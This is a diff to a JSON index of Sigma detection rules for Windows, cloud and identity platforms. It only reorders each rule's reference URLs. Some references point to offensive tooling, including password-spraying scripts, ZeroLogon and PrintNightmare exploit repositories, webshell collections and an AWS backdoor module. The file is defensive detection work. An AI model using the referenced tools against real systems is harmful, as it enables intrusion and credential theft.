"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_redirect_local_admin_share.yml" ], "tags": "No established tags" @@ -67507,8 +67531,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.paloaltonetworks.com/cortex/cortex-xdr/cortex-xdr-analytics-alert-reference/cortex-xdr-analytics-alert-reference/scrcons-exe-rare-child-process.html", "https://redcanary.com/blog/child-processes/", + "https://docs.paloaltonetworks.com/cortex/cortex-xdr/cortex-xdr-analytics-alert-reference/cortex-xdr-analytics-alert-reference/scrcons-exe-rare-child-process.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_script_event_consumer_spawn.yml" ], "tags": [ @@ -67643,8 +67667,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mstsc", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#t1021001---remote-desktop-protocol", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mstsc", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mstsc.yml" ], "tags": [ @@ -67711,9 +67735,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Regini/", - "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regini", + "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://lolbas-project.github.io/lolbas/Binaries/Regini/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regini_ads.yml" ], "tags": [ @@ -67804,9 +67828,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/Alh4zr3d/status/1580925761996828672", - "https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html", "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/", + "https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html", + "https://twitter.com/Alh4zr3d/status/1580925761996828672", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_using_sc_to_hide_sevices.yml" ], "tags": [ @@ -67832,10 +67856,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://isc.sans.edu/diary/More+Data+Exfiltration/25698", - "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#inside-the-registry", - "https://github.com/HyperSine/how-does-MobaXterm-encrypt-password", "https://github.com/synacktiv/Radmin3-Password-Cracker/blob/acfc87393e4b7c06353973a14a6c7126a51f36ac/regkey.txt", + "https://isc.sans.edu/diary/More+Data+Exfiltration/25698", + "https://github.com/HyperSine/how-does-MobaXterm-encrypt-password", + "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#inside-the-registry", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_enumeration_for_credentials_cli.yml" ], "tags": [ @@ -68044,19 +68068,19 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/calebstewart/CVE-2021-1675", + "https://github.com/HarmJ0y/DAMP", "https://github.com/samratashok/nishang", - "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", - "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1", - "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", + "https://github.com/calebstewart/CVE-2021-1675", + "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", + "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", + "https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1", "https://adsecurity.org/?p=2921", "https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html", "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", - "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", - "https://github.com/HarmJ0y/DAMP", - "https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1", + "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", + "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", + "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1", "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", - "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malicious_cmdlets.yml" ], "tags": [ @@ -68289,8 +68313,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://app.any.run/tasks/40115012-a919-4208-bfed-41e82cb3dadf/", "https://twitter.com/bigmacjpg/status/1349727699863011328?s=12", + "https://app.any.run/tasks/40115012-a919-4208-bfed-41e82cb3dadf/", "http://hyp3rlinx.altervista.org/advisories/Windows_TCPIP_Finger_Command_C2_Channel_and_Bypassing_Security_Software.txt", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_finger_usage.yml" ], @@ -68359,8 +68383,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/systeminfo", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-1---system-information-discovery", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/systeminfo", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_systeminfo.yml" ], "tags": [ @@ -68384,9 +68408,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/GossiTheDog/ThreatHunting/blob/e85884abbf05d5b41efc809ea6532b10b45bd05c/AdvancedHuntingQueries/DogWalk-DiagCab", "https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd", "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-9015912909545e72ed42cbac4d1e96295e8964579c406d23fd9c47a8091576a0", + "https://github.com/GossiTheDog/ThreatHunting/blob/e85884abbf05d5b41efc809ea6532b10b45bd05c/AdvancedHuntingQueries/DogWalk-DiagCab", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt_diagcab.yml" ], "tags": [ @@ -68419,10 +68443,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Agentexecutor/", - "https://twitter.com/lefterispan/status/1286259016436514816", - "https://docs.microsoft.com/en-us/mem/intune/apps/intune-management-extension", "https://twitter.com/jseerden/status/1247985304667066373/photo/1", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Agentexecutor/", + "https://docs.microsoft.com/en-us/mem/intune/apps/intune-management-extension", + "https://twitter.com/lefterispan/status/1286259016436514816", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_agentexecutor.yml" ], "tags": [ @@ -68626,9 +68650,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26809", - "https://twitter.com/cyb3rops/status/1514217991034097664", "https://www.bleepingcomputer.com/startups/RpcSs.exe-14544.html", + "https://twitter.com/cyb3rops/status/1514217991034097664", + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26809", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rpcss_anomalies.yml" ], "tags": [ @@ -68772,8 +68796,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/mrd0x/status/1511489821247684615", "https://twitter.com/mrd0x/status/1511415432888131586", + "https://twitter.com/mrd0x/status/1511489821247684615", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_proc_dump_susp_dumpminitool.yml" ], "tags": [ @@ -68807,8 +68831,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/", "https://lolbas-project.github.io/lolbas/Binaries/Xwizard/", + "http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_dll_sideload_xwizard.yml" ], "tags": [ @@ -68856,8 +68880,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://eqllib.readthedocs.io/en/latest/analytics/fcdb99c2-ac3c-4bde-b664-4b336329bed2.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1124/T1124.md", + "https://eqllib.readthedocs.io/en/latest/analytics/fcdb99c2-ac3c-4bde-b664-4b336329bed2.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_time_discovery.yml" ], "tags": [ @@ -68981,8 +69005,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1072/T1072.md", "https://www.radmin.fr/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1072/T1072.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_radmin.yml" ], "tags": [ @@ -69007,8 +69031,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/vxunderground/status/1423336151860002816?s=20", "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", + "https://twitter.com/vxunderground/status/1423336151860002816?s=20", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_conti.yml" ], "tags": [ @@ -69041,8 +69065,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://eqllib.readthedocs.io/en/latest/analytics/d8db43cf-ed52-4f5c-9fb3-c9a4b95a0b56.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.002/T1053.002.md", + "https://eqllib.readthedocs.io/en/latest/analytics/d8db43cf-ed52-4f5c-9fb3-c9a4b95a0b56.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_interactive_at.yml" ], "tags": [ @@ -69183,9 +69207,9 @@ "logsource.category": "antivirus", "logsource.product": "No established product", "refs": [ - "https://twitter.com/mvelazco/status/1410291741241102338", - "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675", "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527", + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675", + "https://twitter.com/mvelazco/status/1410291741241102338", "https://github.com/SigmaHQ/sigma/tree/master/rules/category/antivirus/av_printernightmare_cve_2021_34527.yml" ], "tags": [ @@ -69317,15 +69341,15 @@ "logsource.category": "antivirus", "logsource.product": "No established product", "refs": [ - "https://www.nextron-systems.com/2021/03/25/antivirus-event-analysis-cheat-sheet-v1-8/", - "https://www.virustotal.com/gui/file/a80042c61a0372eaa0c2c1e831adf0d13ef09feaf71d1d20b216156269045801/detection", "https://www.virustotal.com/gui/file/308487ed28a3d9abc1fec7ebc812d4b5c07ab025037535421f64c60d3887a3e8/detection", - "https://www.virustotal.com/gui/file/b8702acf32fd651af9f809ed42d15135f842788cd98d81a8e1b154ee2a2b76a2/detection", - "https://www.virustotal.com/gui/file/b219f7d3c26f8bad7e175934cd5eda4ddb5e3983503e94ff07d39c0666821b7e/detection", + "https://www.virustotal.com/gui/file/a80042c61a0372eaa0c2c1e831adf0d13ef09feaf71d1d20b216156269045801/detection", "https://github.com/tennc/webshell", + "https://www.virustotal.com/gui/file/bd1d52289203866645e556e2766a21d2275877fbafa056a76fe0cf884b7f8819/detection", + "https://www.virustotal.com/gui/file/b8702acf32fd651af9f809ed42d15135f842788cd98d81a8e1b154ee2a2b76a2/detection", "https://www.virustotal.com/gui/file/e841675a4b82250c75273ebf0861245f80c6a1c3d5803c2d995d9d3b18d5c4b5/detection", "https://www.virustotal.com/gui/file/7d3cb8a8ff28f82b07f382789247329ad2d7782a72dde9867941f13266310c80/detection", - "https://www.virustotal.com/gui/file/bd1d52289203866645e556e2766a21d2275877fbafa056a76fe0cf884b7f8819/detection", + "https://www.virustotal.com/gui/file/b219f7d3c26f8bad7e175934cd5eda4ddb5e3983503e94ff07d39c0666821b7e/detection", + "https://www.nextron-systems.com/2021/03/25/antivirus-event-analysis-cheat-sheet-v1-8/", "https://github.com/SigmaHQ/sigma/tree/master/rules/category/antivirus/av_webshell.yml" ], "tags": [ @@ -69504,9 +69528,9 @@ "logsource.category": "No established category", "logsource.product": "okta", "refs": [ + "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/", "https://okta.github.io/okta-help/en/prod/Content/Topics/Security/threat-insight/configure-threatinsight-system-log.htm", - "https://developer.okta.com/docs/reference/api/system-log/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_security_threat_detected.yml" ], "tags": "No established tags" @@ -69527,8 +69551,8 @@ "logsource.category": "No established category", "logsource.product": "okta", "refs": [ - "https://developer.okta.com/docs/reference/api/event-types/", "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_user_account_locked_out.yml" ], "tags": [ @@ -69551,8 +69575,8 @@ "logsource.category": "No established category", "logsource.product": "okta", "refs": [ - "https://developer.okta.com/docs/reference/api/event-types/", "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_api_token_revoked.yml" ], "tags": [ @@ -69575,8 +69599,8 @@ "logsource.category": "No established category", "logsource.product": "okta", "refs": [ - "https://developer.okta.com/docs/reference/api/event-types/", "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml" ], "tags": [ @@ -69599,8 +69623,8 @@ "logsource.category": "No established category", "logsource.product": "okta", "refs": [ - "https://developer.okta.com/docs/reference/api/event-types/", "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_unauthorized_access_to_app.yml" ], "tags": [ @@ -69623,8 +69647,8 @@ "logsource.category": "No established category", "logsource.product": "okta", "refs": [ - "https://developer.okta.com/docs/reference/api/event-types/", "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_application_sign_on_policy_modified_or_deleted.yml" ], "tags": [ @@ -69647,8 +69671,8 @@ "logsource.category": "No established category", "logsource.product": "okta", "refs": [ - "https://developer.okta.com/docs/reference/api/event-types/", "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_admin_role_assigned_to_user_or_group.yml" ], "tags": [ @@ -69671,8 +69695,8 @@ "logsource.category": "No established category", "logsource.product": "okta", "refs": [ - "https://developer.okta.com/docs/reference/api/event-types/", "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_application_modified_or_deleted.yml" ], "tags": [ @@ -69695,8 +69719,8 @@ "logsource.category": "No established category", "logsource.product": "okta", "refs": [ - "https://developer.okta.com/docs/reference/api/event-types/", "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_network_zone_deactivated_or_deleted.yml" ], "tags": [ @@ -69719,8 +69743,8 @@ "logsource.category": "No established category", "logsource.product": "okta", "refs": [ - "https://developer.okta.com/docs/reference/api/event-types/", "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_api_token_created.yml" ], "tags": [ @@ -69743,8 +69767,8 @@ "logsource.category": "No established category", "logsource.product": "okta", "refs": [ - "https://developer.okta.com/docs/reference/api/event-types/", "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_mfa_reset_or_deactivated.yml" ], "tags": [ @@ -69769,8 +69793,8 @@ "logsource.category": "No established category", "logsource.product": "okta", "refs": [ - "https://developer.okta.com/docs/reference/api/event-types/", "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_policy_modified_or_deleted.yml" ], "tags": [ @@ -69953,11 +69977,11 @@ "logsource.category": "No established category", "logsource.product": "m365", "refs": [ - "https://o365blog.com/post/aadbackdoor/", - "https://www.sygnia.co/golden-saml-advisory", "https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html", "https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/wp-m-unc2452-2021-000343-01.pdf", + "https://www.sygnia.co/golden-saml-advisory", "https://us-cert.cisa.gov/ncas/alerts/aa21-008a", + "https://o365blog.com/post/aadbackdoor/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_new_federated_domain_added.yml" ], "tags": [ @@ -70363,11 +70387,11 @@ "logsource.category": "No established category", "logsource.product": "gcp", "refs": [ - "https://cloud.google.com/kubernetes-engine/docs/how-to/role-based-access-control", - "https://kubernetes.io/docs/reference/kubernetes-api/authorization-resources/cluster-role-v1/#ClusterRole", "https://kubernetes.io/docs/reference/access-authn-authz/rbac/", "https://github.com/elastic/detection-rules/pull/1267", + "https://kubernetes.io/docs/reference/kubernetes-api/authorization-resources/cluster-role-v1/#ClusterRole", "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging", + "https://cloud.google.com/kubernetes-engine/docs/how-to/role-based-access-control", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_kubernetes_rolebinding.yml" ], "tags": [ @@ -70416,8 +70440,8 @@ "logsource.product": "gcp", "refs": [ "https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/", - "https://cloud.google.com/kubernetes-engine/docs", "https://kubernetes.io/docs/concepts/workloads/controllers/job/", + "https://cloud.google.com/kubernetes-engine/docs", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_kubernetes_cronjob.yml" ], "tags": [ @@ -70468,8 +70492,8 @@ "logsource.category": "No established category", "logsource.product": "gcp", "refs": [ - "https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.Firewalls.html", "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging", + "https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.Firewalls.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_firewall_rule_modified_or_deleted.yml" ], "tags": [ @@ -70638,8 +70662,8 @@ "logsource.category": "No established category", "logsource.product": "gcp", "refs": [ - "https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.PacketMirrorings.html", "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging", + "https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.PacketMirrorings.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_full_network_traffic_packet_capture.yml" ], "tags": [ @@ -70672,8 +70696,8 @@ "logsource.category": "No established category", "logsource.product": "google_workspace", "refs": [ - "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION_FROM_WHITELIST", + "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_application_removed.yml" ], @@ -70779,8 +70803,8 @@ "logsource.category": "No established category", "logsource.product": "google_workspace", "refs": [ - "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings#ENFORCE_STRONG_AUTHENTICATION", + "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings?hl=en#ALLOW_STRONG_AUTHENTICATION", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_mfa_disabled.yml" ], @@ -70884,13 +70908,13 @@ "logsource.category": "No established category", "logsource.product": "aws", "refs": [ - "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketEncryption.html", - "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketWebsite.html", - "https://docs.aws.amazon.com/AmazonS3/latest/API/API_Operations.html", - "https://docs.aws.amazon.com/AmazonS3/latest/API/API_RestoreObject.html", - "https://docs.aws.amazon.com/AmazonS3/latest/userguide/setting-repl-config-perm-overview.html", "https://github.com/elastic/detection-rules/pull/1145/files", + "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketEncryption.html", + "https://docs.aws.amazon.com/AmazonS3/latest/API/API_RestoreObject.html", + "https://docs.aws.amazon.com/AmazonS3/latest/API/API_Operations.html", + "https://docs.aws.amazon.com/AmazonS3/latest/userguide/setting-repl-config-perm-overview.html", "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketLogging.html", + "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketWebsite.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_s3_data_management_tampering.yml" ], "tags": [ @@ -71033,8 +71057,8 @@ "logsource.category": "No established category", "logsource.product": "aws", "refs": [ - "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ecs__backdoor_task_def/main.py", "https://docs.aws.amazon.com/AmazonECS/latest/APIReference/API_RegisterTaskDefinition.html", + "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ecs__backdoor_task_def/main.py", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_ecs_task_definition_backdoor.yml" ], "tags": [ @@ -71429,8 +71453,8 @@ "logsource.category": "No established category", "logsource.product": "aws", "refs": [ - "https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithSAML.html", "https://docs.aws.amazon.com/IAM/latest/APIReference/API_UpdateSAMLProvider.html", + "https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithSAML.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_susp_saml_activity.yml" ], "tags": [ @@ -71616,9 +71640,9 @@ "logsource.category": "No established category", "logsource.product": "aws", "refs": [ + "https://securitycafe.ro/2022/12/14/aws-enumeration-part-ii-practical-enumeration/", "https://github.com/Lifka/hacking-resources/blob/c2ae355d381bd0c9f0b32c4ead049f44e5b1573f/cloud-hacking-cheat-sheets.md", "https://jamesonhacking.blogspot.com/2020/12/pivoting-to-private-aws-s3-buckets.html", - "https://securitycafe.ro/2022/12/14/aws-enumeration-part-ii-practical-enumeration/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_enum_buckets.yml" ], "tags": [ @@ -71849,9 +71873,9 @@ "logsource.category": "No established category", "logsource.product": "aws", "refs": [ - "https://docs.aws.amazon.com/Route53/latest/APIReference/API_Operations_Amazon_Route_53.html", - "https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml", "https://docs.aws.amazon.com/Route53/latest/APIReference/API_domains_DisableDomainTransferLock.html", + "https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml", + "https://docs.aws.amazon.com/Route53/latest/APIReference/API_Operations_Amazon_Route_53.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_route_53_domain_transferred_lock_disabled.yml" ], "tags": [ @@ -71989,8 +72013,8 @@ "logsource.category": "No established category", "logsource.product": "aws", "refs": [ - "https://docs.aws.amazon.com/glue/latest/webapi/API_CreateDevEndpoint.html", "https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/", + "https://docs.aws.amazon.com/glue/latest/webapi/API_CreateDevEndpoint.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_passed_role_to_glue_development_endpoint.yml" ], "tags": [ @@ -72843,8 +72867,8 @@ "logsource.category": "No established category", "logsource.product": "azure", "refs": [ - "https://github.com/elastic/detection-rules/blob/065bf48a9987cd8bd826c098a30ce36e6868ee46/rules/integrations/azure/impact_kubernetes_pod_deleted.toml", "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", + "https://github.com/elastic/detection-rules/blob/065bf48a9987cd8bd826c098a30ce36e6868ee46/rules/integrations/azure/impact_kubernetes_pod_deleted.toml", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_pods_deleted.yml" ], "tags": [ @@ -73064,11 +73088,11 @@ "logsource.category": "No established category", "logsource.product": "azure", "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://attack.mitre.org/matrices/enterprise/cloud/", - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_cluster_created_or_deleted.yml" ], "tags": [ @@ -74003,11 +74027,11 @@ "logsource.category": "No established category", "logsource.product": "azure", "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://attack.mitre.org/matrices/enterprise/cloud/", - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_secret_or_config_object_access.yml" ], "tags": [ @@ -74065,11 +74089,11 @@ "logsource.category": "No established category", "logsource.product": "azure", "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://attack.mitre.org/matrices/enterprise/cloud/", - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_role_access.yml" ], "tags": [ @@ -74211,11 +74235,11 @@ "logsource.category": "No established category", "logsource.product": "azure", "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://attack.mitre.org/matrices/enterprise/cloud/", - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", 